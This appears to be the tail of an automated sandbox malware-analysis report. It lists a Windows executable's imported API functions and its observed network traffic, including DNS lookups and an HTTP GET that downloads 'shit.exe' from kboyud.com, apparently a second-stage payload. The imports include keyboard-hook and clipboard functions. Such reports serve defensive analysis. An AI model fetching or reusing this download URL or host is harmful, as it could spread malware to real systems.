0x48c3a4 SelectClipRgn
0x48c3a8 SaveDC
0x48c3ac RestoreDC
0x48c3b0 Rectangle
0x48c3b4 RectVisible
0x48c3b8 RealizePalette
0x48c3bc Polyline
0x48c3c0 PlayEnhMetaFile
0x48c3c4 PathToRegion
0x48c3c8 PatBlt
0x48c3cc MoveToEx
0x48c3d0 MaskBlt
0x48c3d4 LineTo
0x48c3d8 LPtoDP
0x48c3dc IntersectClipRect
0x48c3e0 GetWindowOrgEx
0x48c3e4 GetWinMetaFileBits
0x48c3e8 GetTextMetricsA
0x48c3f4 GetStockObject
0x48c3f8 GetPixel
0x48c3fc GetPaletteEntries
0x48c400 GetObjectA
0x48c410 GetEnhMetaFileBits
0x48c414 GetDeviceCaps
0x48c418 GetDIBits
0x48c41c GetDIBColorTable
0x48c420 GetDCOrgEx
0x48c428 GetClipBox
0x48c42c GetBrushOrgEx
0x48c430 GetBitmapBits
0x48c434 ExtTextOutA
0x48c438 ExcludeClipRect
0x48c43c DeleteObject
0x48c440 DeleteEnhMetaFile
0x48c444 DeleteDC
0x48c448 CreateSolidBrush
0x48c44c CreatePenIndirect
0x48c450 CreatePalette
0x48c458 CreateFontIndirectA
0x48c45c CreateEnhMetaFileA
0x48c460 CreateDIBitmap
0x48c464 CreateDIBSection
0x48c468 CreateCompatibleDC
0x48c470 CreateBrushIndirect
0x48c474 CreateBitmap
0x48c478 CopyEnhMetaFileA
0x48c47c CloseEnhMetaFile
0x48c480 BitBlt
Library user32.dll:
0x48c488 CreateWindowExA
0x48c48c WindowFromPoint
0x48c490 WinHelpA
0x48c494 WaitMessage
0x48c498 UpdateWindow
0x48c49c UnregisterClassA
0x48c4a0 UnhookWindowsHookEx
0x48c4a4 TranslateMessage
0x48c4ac TrackPopupMenu
0x48c4b4 ShowWindow
0x48c4b8 ShowScrollBar
0x48c4bc ShowOwnedPopups
0x48c4c0 ShowCursor
0x48c4c4 SetWindowsHookExA
0x48c4c8 SetWindowTextA
0x48c4cc SetWindowPos
0x48c4d0 SetWindowPlacement
0x48c4d4 SetWindowLongA
0x48c4d8 SetTimer
0x48c4dc SetScrollRange
0x48c4e0 SetScrollPos
0x48c4e4 SetScrollInfo
0x48c4e8 SetRect
0x48c4ec SetPropA
0x48c4f0 SetParent
0x48c4f4 SetMenuItemInfoA
0x48c4f8 SetMenu
0x48c4fc SetForegroundWindow
0x48c500 SetFocus
0x48c504 SetCursor
0x48c508 SetClassLongA
0x48c50c SetCapture
0x48c510 SetActiveWindow
0x48c514 SendMessageA
0x48c518 ScrollWindow
0x48c51c ScreenToClient
0x48c520 RemovePropA
0x48c524 RemoveMenu
0x48c528 ReleaseDC
0x48c52c ReleaseCapture
0x48c538 RegisterClassA
0x48c53c RedrawWindow
0x48c540 PtInRect
0x48c544 PostQuitMessage
0x48c548 PostMessageA
0x48c54c PeekMessageA
0x48c550 OffsetRect
0x48c554 OemToCharA
0x48c558 MessageBoxA
0x48c55c MessageBeep
0x48c560 MapWindowPoints
0x48c564 MapVirtualKeyA
0x48c568 LoadStringA
0x48c56c LoadKeyboardLayoutA
0x48c570 LoadIconA
0x48c574 LoadCursorA
0x48c578 LoadBitmapA
0x48c57c KillTimer
0x48c580 IsZoomed
0x48c584 IsWindowVisible
0x48c588 IsWindowEnabled
0x48c58c IsWindow
0x48c590 IsRectEmpty
0x48c594 IsIconic
0x48c598 IsDialogMessageA
0x48c59c IsChild
0x48c5a0 InvalidateRect
0x48c5a4 IntersectRect
0x48c5a8 InsertMenuItemA
0x48c5ac InsertMenuA
0x48c5b0 InflateRect
0x48c5b8 GetWindowTextA
0x48c5bc GetWindowRect
0x48c5c0 GetWindowPlacement
0x48c5c4 GetWindowLongA
0x48c5c8 GetWindowDC
0x48c5cc GetTopWindow
0x48c5d0 GetSystemMetrics
0x48c5d4 GetSystemMenu
0x48c5d8 GetSysColorBrush
0x48c5dc GetSysColor
0x48c5e0 GetSubMenu
0x48c5e4 GetScrollRange
0x48c5e8 GetScrollPos
0x48c5ec GetScrollInfo
0x48c5f0 GetPropA
0x48c5f4 GetParent
0x48c5f8 GetWindow
0x48c5fc GetMessageTime
0x48c600 GetMenuStringA
0x48c604 GetMenuState
0x48c608 GetMenuItemInfoA
0x48c60c GetMenuItemID
0x48c610 GetMenuItemCount
0x48c614 GetMenu
0x48c618 GetLastActivePopup
0x48c61c GetKeyboardState
0x48c624 GetKeyboardLayout
0x48c628 GetKeyState
0x48c62c GetKeyNameTextA
0x48c630 GetIconInfo
0x48c634 GetForegroundWindow
0x48c638 GetFocus
0x48c63c GetDlgItem
0x48c640 GetDesktopWindow
0x48c644 GetDCEx
0x48c648 GetDC
0x48c64c GetCursorPos
0x48c650 GetCursor
0x48c654 GetClipboardData
0x48c658 GetClientRect
0x48c65c GetClassNameA
0x48c660 GetClassInfoA
0x48c664 GetCapture
0x48c668 GetActiveWindow
0x48c66c FrameRect
0x48c670 FindWindowA
0x48c674 FillRect
0x48c678 EqualRect
0x48c67c EnumWindows
0x48c680 EnumThreadWindows
0x48c684 EndPaint
0x48c688 EnableWindow
0x48c68c EnableScrollBar
0x48c690 EnableMenuItem
0x48c694 DrawTextA
0x48c698 DrawMenuBar
0x48c69c DrawIconEx
0x48c6a0 DrawIcon
0x48c6a4 DrawFrameControl
0x48c6a8 DrawFocusRect
0x48c6ac DrawEdge
0x48c6b0 DispatchMessageA
0x48c6b4 DestroyWindow
0x48c6b8 DestroyMenu
0x48c6bc DestroyIcon
0x48c6c0 DestroyCursor
0x48c6c4 DeleteMenu
0x48c6c8 DefWindowProcA
0x48c6cc DefMDIChildProcA
0x48c6d0 DefFrameProcA
0x48c6d4 CreatePopupMenu
0x48c6d8 CreateMenu
0x48c6dc CreateIcon
0x48c6e0 ClientToScreen
0x48c6e4 CheckMenuItem
0x48c6e8 CallWindowProcA
0x48c6ec CallNextHookEx
0x48c6f0 BeginPaint
0x48c6f4 CharNextA
0x48c6f8 CharLowerBuffA
0x48c6fc CharLowerA
0x48c700 CharUpperBuffA
0x48c704 CharToOemA
0x48c708 AdjustWindowRectEx
Library kernel32.dll:
0x48c714 Sleep
Library oleaut32.dll:
0x48c71c SafeArrayPtrOfIndex
0x48c720 SafeArrayPutElement
0x48c724 SafeArrayGetElement
0x48c72c SafeArrayAccessData
0x48c730 SafeArrayGetUBound
0x48c734 SafeArrayGetLBound
0x48c738 SafeArrayCreate
0x48c73c VariantChangeType
0x48c740 VariantCopyInd
0x48c744 VariantCopy
0x48c748 VariantClear
0x48c74c VariantInit
Library ole32.dll:
0x48c758 IsAccelerator
0x48c75c OleDraw
0x48c764 CoTaskMemFree
0x48c768 ProgIDFromCLSID
0x48c76c StringFromCLSID
0x48c770 CoCreateInstance
0x48c774 CoGetClassObject
0x48c778 CoUninitialize
0x48c77c CoInitialize
0x48c780 IsEqualGUID
Library oleaut32.dll:
0x48c788 GetErrorInfo
0x48c78c GetActiveObject
0x48c790 SysFreeString
Library comctl32.dll:
0x48c7a0 ImageList_Write
0x48c7a4 ImageList_Read
0x48c7b4 ImageList_DragMove
0x48c7b8 ImageList_DragLeave
0x48c7bc ImageList_DragEnter
0x48c7c0 ImageList_EndDrag
0x48c7c4 ImageList_BeginDrag
0x48c7c8 ImageList_Remove
0x48c7cc ImageList_DrawEx
0x48c7d0 ImageList_Replace
0x48c7d4 ImageList_Draw
0x48c7e4 ImageList_Add
0x48c7ec ImageList_Destroy
0x48c7f0 ImageList_Create
Library comdlg32.dll:
0x48c7f8 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49183 52.6.206.192 kboyud.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 58367 8.8.8.8 53

HTTP & HTTPS Requests

URI Data
http://kboyud.com/io/panel/shit.exe
GET /io/panel/shit.exe HTTP/1.0
Host: kboyud.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.